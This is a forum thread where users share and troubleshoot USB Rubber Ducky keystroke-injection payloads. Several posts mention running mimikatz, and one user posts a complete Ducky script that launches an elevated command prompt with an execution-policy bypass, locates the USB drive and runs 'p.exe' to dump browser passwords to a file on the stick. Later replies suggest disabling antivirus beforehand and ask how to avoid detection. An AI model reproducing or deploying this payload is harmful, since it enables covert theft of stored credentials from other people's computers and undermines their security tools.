Ferryman Posted November 27, 2016 Share Posted November 27, 2016 cool, will check it out this evening. Thanks Quote Link to comment Share on other sites More sharing options...
846846 Posted November 27, 2016 Share Posted November 27, 2016 Hello Enzym3, link works fine now... thanks Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted November 28, 2016 Share Posted November 28, 2016 Keep in mind, this is not what I intended to release. This was just a few hours work taking two separate tools already available, heavily gutting and jerry-rigging it just enough that I knew that it would work in concept. Prior to starting this project, I had zero experience in Powershell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edit's I've made and it looks sloppy as all hell, or there's multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code leftover from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything and making it efficient and adding a handful of other handy features. TL;DR - I'm brand new as Powershell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least can serve as a springboard for some way cooler shit. Cheers, -Enzym3 Quote Link to comment Share on other sites More sharing options...
Mr.X Posted December 8, 2016 Share Posted December 8, 2016 On 9/14/2016 at 2:50 PM, EvilTtaM said: I attached the Ducky Code I used, If there are any suggestions for changes please let me know. I will add that this code assumes that the executionpolicy is set to bypass, however it could be written in to change that. 15secondhack.txt Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet? Quote Link to comment Share on other sites More sharing options...
jes Posted December 9, 2016 Share Posted December 9, 2016 Thanks for all this Enzym3. Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe? Quote Link to comment Share on other sites More sharing options...
SOMEB Posted December 10, 2016 Share Posted December 10, 2016 Is there a way you can make it so i can run it on the normal duck instead of the twin duck? either way thanks Quote Link to comment Share on other sites More sharing options...
jes Posted December 10, 2016 Share Posted December 10, 2016 On 2016-12-08 at 6:42 PM, Mr.X said: Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet? I got the same error for whiterabbit.ps1 Quote Link to comment Share on other sites More sharing options...
jes Posted December 10, 2016 Share Posted December 10, 2016 Here is a payload that will run the p.exe using command prompt instead of powershell... I wanted this because not all computers have powershell enabled but they all have command prompt ;) DELAY 1200 GUI R DELAY 300 STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs" DELAY 200 ENTER DELAY 500 ALT y DELAY 100 LEFTARROW DELAY 200 DELETE DELAY 200 STRING mode con lines=1 cols=18 DELAY 80 ENTER DELAY 80 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d DELAY 250 ENTER DELAY 200 STRING %duck% ENTER DELAY 150 STRING p.exe /stext pass.txt DELAY 100 ENTER DELAY 2000 STRING exit DELAY 80 ENTER I'm not 100% sure why I need the LEFTARROW or DELETE commands, I'm thinking of taking them out but I also grabbed portions of this from elsewheres of course and they were there. Open to suggestions. Quote Link to comment Share on other sites More sharing options...
jes Posted December 10, 2016 Share Posted December 10, 2016 Sorry forgot to mention that p.exe grabs the browser passwords and you need the twin duck firmware installed to be able to save them onto the USB in this script. Quote Link to comment Share on other sites More sharing options...
authorityfinger Posted December 12, 2016 Share Posted December 12, 2016 Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :( Quote Link to comment Share on other sites More sharing options...
jes Posted December 13, 2016 Share Posted December 13, 2016 15 hours ago, authorityfinger said: Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :( Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine. Quote Link to comment Share on other sites More sharing options...
Ferryman Posted December 13, 2016 Share Posted December 13, 2016 See, that's the thing. I know we are just being a bunch of script kiddies and that is why AV is detecting us, but there needs to be a way to go unnoticed. I mean, that is the purpose of this isn't it? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.